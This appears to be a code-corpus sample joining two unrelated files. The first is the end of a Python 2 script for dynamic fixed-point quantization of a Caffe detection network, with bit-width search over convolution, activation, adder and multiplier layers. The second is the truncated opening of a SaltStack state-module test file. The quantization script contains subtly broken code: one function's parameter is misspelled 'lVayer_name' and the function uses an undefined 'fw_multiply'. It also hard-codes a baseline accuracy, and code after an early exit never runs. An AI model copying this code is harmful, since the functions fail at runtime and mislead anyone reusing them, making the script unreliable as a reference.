bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, lVayer_name,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.bw_add = bw_add
l.quantization_param.fl_add = fl_add
l.quantization_param.bw_multiply = bw_multiply
l.quantization_param.fl_multiply = fw_multiply
return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0.
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
if layer.name =='layer1-conv':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name]
input_FL = input_bw - input_IL
#elif layer.name =='layer15-conv':
# output_IL = net_output_IL[layer.name]
# output_FL = output_bw - output_IL
# input_IL = net_input_IL[layer.name] + extra_IL
# input_FL = input_bw - input_IL
else:
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
with open(outf, 'w') as f:
f.write(str(net_proto))
#test network with no string printed
def test_qnet(net_path, caffemodel_path, imdb):
net = caffe.Net(net_path, caffemodel_path, caffe.TEST)
net.name = os.path.splitext(os.path.basename(caffemodel_path))[0]
ap = test_net_silent(net, imdb, max_per_image=args.max_per_image, vis=args.vis)
return ap
#print each layer name and spec
def print_net_layer_names(net):
print("Network layers:")
for name, layer in zip(net._layer_names, net.layers):
if layer.type == 'ConvolutionIVS' or layer.type == 'Convolution':
print("{:<30}: {:22s}({} blobs)".format(name, layer.type, len(layer.blobs)))
print dir(layer)
print layer.reshape
print layer.convolution_param
print net.layer[1].name
def mAP_worker(i, net_path, shared_dict, GPU_ID):
#caffe.set_mode_cpu()
#GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
#cfg.GPU_ID = GPU_ID
#caffe.set_device(GPU_ID)
#caffe.set_mode_gpu()
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
ap_string = check_output('./caffe-fast-rcnn/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True)
ap = 0.
if len(ap_string) != 0:
ap = float(ap_string)
#ap = float(check_output('./caffe-fast-rcnn-c3d/caffe-fast-rcnn-2/build/tools/caffe test_detection --model=' + net_path + ' --weights=' + args.caffemodel + ' -iterations=' + str(num_iters) + ' -gpu='+str(GPU_ID),shell=True))
#ap = test_qnet(net_path, args.caffemodel, imdb)
#ap = test_qnet(net_path, args.caffemodel, imdb)
shared_dict[i] = ap
def analyze_net_output_IL_worker(net_output_IL, net_input_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
#caffe.set_mode_cpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_output_IL_, net_input_IL_ = analyze_net_output_IL(net, net_proto)
for t in net_output_IL_.keys():
net_output_IL[t] = net_output_IL_[t]
for t in net_input_IL_.keys():
net_input_IL[t] = net_input_IL_[t]
def analyze_net_adder_multiplier_IL_worker(net_adder_IL, net_multiplier_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
#caffe.set_mode_cpu()
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
net_BAC = caffe.Net(args.prototxt_quantized_BAC, args.caffemodel, caffe.TEST)
#imdb = get_imdb(args.imdb_name)
#imdb.competition_mode(args.comp_mode)
#if not cfg.TEST.HAS_RPN:
# imdb.set_proposal_method(cfg.TEST.PROPOSAL_METHOD)
net_adder_IL_, net_multiplier_IL_ = analyze_net_adder_multiplier_IL(net_BAC, net_proto_BAC)
for t in net_adder_IL_.keys():
net_adder_IL[t] = net_adder_IL_[t]
for t in net_multiplier_IL_.keys():
net_multiplier_IL[t] = net_multiplier_IL_[t]
def analyze_net_param_IL_worker(net_param_IL, GPU_ID):
cfg.GPU_ID = GPU_ID
caffe.set_device(GPU_ID)
caffe.set_mode_gpu()
net_proto = read_from_prototxt(args.prototxt_quantized)
net = caffe.Net(args.prototxt_quantized, args.caffemodel, caffe.TEST)
net_param_IL_ = analyze_net_param_IL(net, net_proto)
for t in net_param_IL_.keys():
net_param_IL[t] = net_param_IL_[t]
if __name__ == '__main__':
args = parse_args()
num_iters = 5000
print('Called with args:')
print(args)
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
cfg.GPU_ID = args.gpu_id
print('Using config:')
pprint.pprint(cfg)
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
print 'Create quantized prototxt'
print 'Testing Full Precision Accuracy'
manager = multiprocessing.Manager()
shared_dict = manager.dict()
GPU1 = 3
GPU2 = 3
#p = multiprocessing.Process(target=mAP_worker, args=('FP-FP-FP-FP-FP', args.prototxt, shared_dict, GPU1))
timer = Timer()
timer.tic()
#p.start()
#p.join()
timer.toc()
print ('Took {:.3f}s').format(timer.total_time)
#full_ap = shared_dict['FP-FP-FP-FP-FP']
full_ap = 0.334307
print 'Full precision accuracy : {}'.format(full_ap)
# Bit Width for Analyze
bw_range_conv = [8, 4] #bit width for convolution layers
bw_range_deconv = [32, 16, 8, 4, 2] #bit width for deconvolution layers
bw_range_fc = [32, 16, 8, 7, 6, 5, 4, 2] #bit width for fully connected layers
bw_range_output = [32, 16, 8, 4, 2] #bit width for layer input and output
bw_conv = 8 #just initial
bw_deconv = 0 #just initial
bw_fc = 0 #just initial
bw_output =8 #just initial
bw_adder = 12 #just initial
bw_multiplier = 12 #just initial
convIL_reduction = -1
deconvIL_reduction = 0
fcIL_reduction = 0
actIL_reduction = -2
adderIL_reduction = 0
multIL_reduction = 0
print 'Analyzing network'
net_proto = read_from_prototxt(args.prototxt)
has_conv, has_deconv, has_fc = analyze_network(net_proto)
print 'Network Structure'
print 'CONV:{}, DECONV:{}, FC:{}'.format(has_conv, has_deconv, has_fc)
print '-----------------------------------'
net_proto = read_from_prototxt(args.prototxt_quantized)
print 'Analyzing network parameter IL'
net_param_IL = manager.dict()
p = multiprocessing.Process(target=analyze_net_param_IL_worker,
args=(net_param_IL, GPU1, ))
p.start()
p.join()
with open('param_analysis.json', 'w') as outfile:
param_analysis = dict()
param_analysis['net_param_IL'] = dict()
for t in net_param_IL.keys():
param_analysis['net_param_IL'][t] = net_param_IL[t]
json.dump(param_analysis, outfile)
net_output_IL = manager.dict()
net_input_IL = manager.dict()
if args.act_analysis == None:
print 'Analyzing network output IL'
p = multiprocessing.Process(target=analyze_net_output_IL_worker,
args=(net_output_IL, net_input_IL, GPU1))
p.start()
p.join()
with open('act_analysis.json', 'w') as outfile:
act_analysis = dict()
act_analysis['net_output_IL'] = dict()
act_analysis['net_input_IL'] = dict()
for t in net_output_IL.keys():
act_analysis['net_output_IL'][t] = net_output_IL[t]
for t in net_input_IL.keys():
act_analysis['net_input_IL'][t] = net_input_IL[t]
json.dump(act_analysis, outfile)
else:
print 'Loading network output IL'
with open(args.act_analysis) as json_data:
act_analysis = json.load(json_data)
for t in act_analysis['net_output_IL'].keys():
net_output_IL[t] = act_analysis['net_output_IL'][t]
for t in act_analysis['net_input_IL'].keys():
net_input_IL[t] = act_analysis['net_input_IL'][t]
#Make Final Quantized Prototxt
print 'Final Quantization Testing'
net_proto = read_from_prototxt(args.prototxt_quantized)
quantize_net_conv(net_proto, net_param_IL, bw_conv, convIL_reduction)
#quantize_net_deconv(net_proto, net_param_IL, bw_conv, deconvIL_reduction)
#quantize_net_fc(net_proto, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto, net_output_IL, net_input_IL, bw_output, actIL_reduction)
write_to_prototxt(net_proto, './temp.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-32-32', './temp.prototxt',
shared_dict, GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-32-32']
layer_ap = ap
#ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit CONV, {}bit FC, {}bit layer output'.format(bw_conv, bw_fc, bw_output)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print 'Please fine-tune'
write_to_prototxt(net_proto, args.prototxt_quantized)
print 'Quantized Model saved to', args.prototxt_quantized
sys.exit(0)
print 'Create Bit-Accurate quantized prototxt'
convert_net_to_qnet_BAC_analysis(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Bit-Accurate quantized prototxt'
#print 'Analyzing network adder and multiplier'
net_adder_IL = manager.dict()
net_multiplier_IL = manager.dict()
if args.accumulator_analysis == None:
print 'Analyzing network adder and multiplier'
p = multiprocessing.Process(target=analyze_net_adder_multiplier_IL_worker,
args=(net_adder_IL, net_multiplier_IL, GPU1))
p.start()
p.join()
with open('accumulator_analysis.json', 'w') as outfile:
accumulator_analysis = dict()
accumulator_analysis['net_adder_IL'] = dict()
accumulator_analysis['net_multiplier_IL'] = dict()
for t in net_adder_IL.keys():
accumulator_analysis['net_adder_IL'][t] = net_adder_IL[t]
for t in net_multiplier_IL.keys():
accumulator_analysis['net_multiplier_IL'][t] = net_multiplier_IL[t]
json.dump(accumulator_analysis, outfile)
else:
print 'Loading network adder and multiplier analysis file'
with open(args.accumulator_analysis) as json_data:
accumulator_analysis = json.load(json_data)
for t in accumulator_analysis['net_adder_IL'].keys():
net_adder_IL[t] = accumulator_analysis['net_adder_IL'][t]
for t in accumulator_analysis['net_multiplier_IL'].keys():
net_multiplier_IL[t] = accumulator_analysis['net_multiplier_IL'][t]
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
print 'Analyzing layer multiplier'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i),
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, i+1, multIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-32-'+str(i+1),
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-32-'+str(j)],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-32-'+str(j)] > (layer_ap - 0.005):
bw_multiplier = j
not_found = False
break;
i = i + 2
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_multiplier(net_proto_BAC, net_multiplier_IL, bw_multiplier, multIL_reduction)
write_to_prototxt(net_proto_BAC, args.prototxt_quantized_BAC)
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer multiplier'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_multiplier(net_BAC, net_proto_BAC, net_multiplier_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_multiplier = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Analyzing layer adder'
print '\tbit width\t accuracy'
i = bw_output
not_found = True
while not_found:
timer = Timer()
timer.tic()
jobs = []
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i)+'.prototxt')
p1 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i)+'-32',
'./temp'+str(i)+'.prototxt',
shared_dict,GPU1))
jobs.append(p1)
p1.start()
net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
quantize_net_adder(net_proto_BAC, net_adder_IL, i+1, adderIL_reduction)
write_to_prototxt(net_proto_BAC, './temp'+str(i+1)+'.prototxt')
p2 = multiprocessing.Process(target=mAP_worker, args=('32-32-32-'+str(i+1)+'-32',
'./temp'+str(i+1)+'.prototxt',
shared_dict,GPU2))
jobs.append(p2)
p2.start()
for proc in jobs:
proc.join()
timer.toc()
for j in range(i, i+2):
print '\t{}bit:\t\t{} {:.3f}s'.format(j,shared_dict['32-32-32-'+str(j)+'-32'],timer.total_time)
for j in range(i, i+2):
if shared_dict['32-32-32-'+str(j)+'-32'] > (layer_ap - 0.005):
bw_adder = j
not_found = False
break;
i = i + 2
#bw_h = 16
#bw_l = 0
#bw = 16
#print 'Analyzing layer adder'
#print '\tbit width\t accuracy'
#while True:
# net_proto_BAC = read_from_prototxt(args.prototxt_quantized_BAC)
# quantize_net_adder(net_BAC, net_proto_BAC, net_adder_IL, bw)
# write_to_prototxt(net_proto_BAC, './temp.prototxt')
# ap = test_qnet('./temp.prototxt', args.caffemodel, imdb)
# print '\t{}bit:\t\t{}'.format(bw,ap)
# if ap < (full_ap - args.error_margin):
# bw_l = bw
# else:
# bw_h = bw
# bw_adder = bw
# if bw_h - bw_l <=1:
# break
# bw = bw_l + (bw_h-bw_l)/2
print 'Create Final Bit-Accurate quantized prototxt'
convert_net_to_qnet(args.prototxt, args.prototxt_quantized)
convert_net_to_qnet_BAC(args.prototxt_quantized, args.prototxt_quantized_BAC)
net_proto_final = read_from_prototxt(args.prototxt_quantized_BAC)
print 'Loading Final Bit-Accurate quantized prototxt'
quantize_net_conv(net_proto_final, net_param_IL, bw_conv, convIL_reduction)
quantize_net_deconv(net_proto_final, net_param_IL, bw_conv, deconvIL_reduction)
quantize_net_fc(net_proto_final, net_param_IL, bw_fc, fcIL_reduction)
quantize_net_output(net_proto_final, net_output_IL, net_input_IL, bw_output, actIL_reduction)
quantize_net_multiplier(net_proto_final, net_multiplier_IL, bw_multiplier, multIL_reduction)
quantize_net_adder(net_proto_final, net_adder_IL, bw_adder, adderIL_reduction)
write_to_prototxt(net_proto_final, './temp_f.prototxt')
p = multiprocessing.Process(target=mAP_worker, args=('DQ-DQ-DQ-DQ-DQ', './temp_f.prototxt',
shared_dict,GPU1))
p.start()
p.join()
ap = shared_dict['DQ-DQ-DQ-DQ-DQ']
#ap = test_qnet('./temp_f.prototxt', args.caffemodel, imdb)
print '----------------------------------------'
print '{}bit adder, {}bit multiplier,'.format(bw_adder, bw_multiplier)
print 'Accuracy {}'.format(ap)
print 'Dynamic fixed point net:'
print '{}bit CONV and DECONV weights'.format(bw_conv)
print '{}bit FC weights'.format(bw_fc)
print '{}bit layer activations'.format(bw_output)
print '{}bit adder'.format(bw_adder)
print '{}bit multiplier'.format(bw_multiplier)
print 'Please fine-tune'
write_to_prototxt(net_proto_final, args.prototxt_quantized_BAC)
print 'Bit-Accurate Quantized Model saved to', args.prototxt_quantized_BAC
GPU_ID = 2 # Switch between 0 and 1 depending on the GPU you want to use.
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import shutil
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.unit import skipIf
from tests.support.paths import TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
import logging
log = logging.getLogger(__name__)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
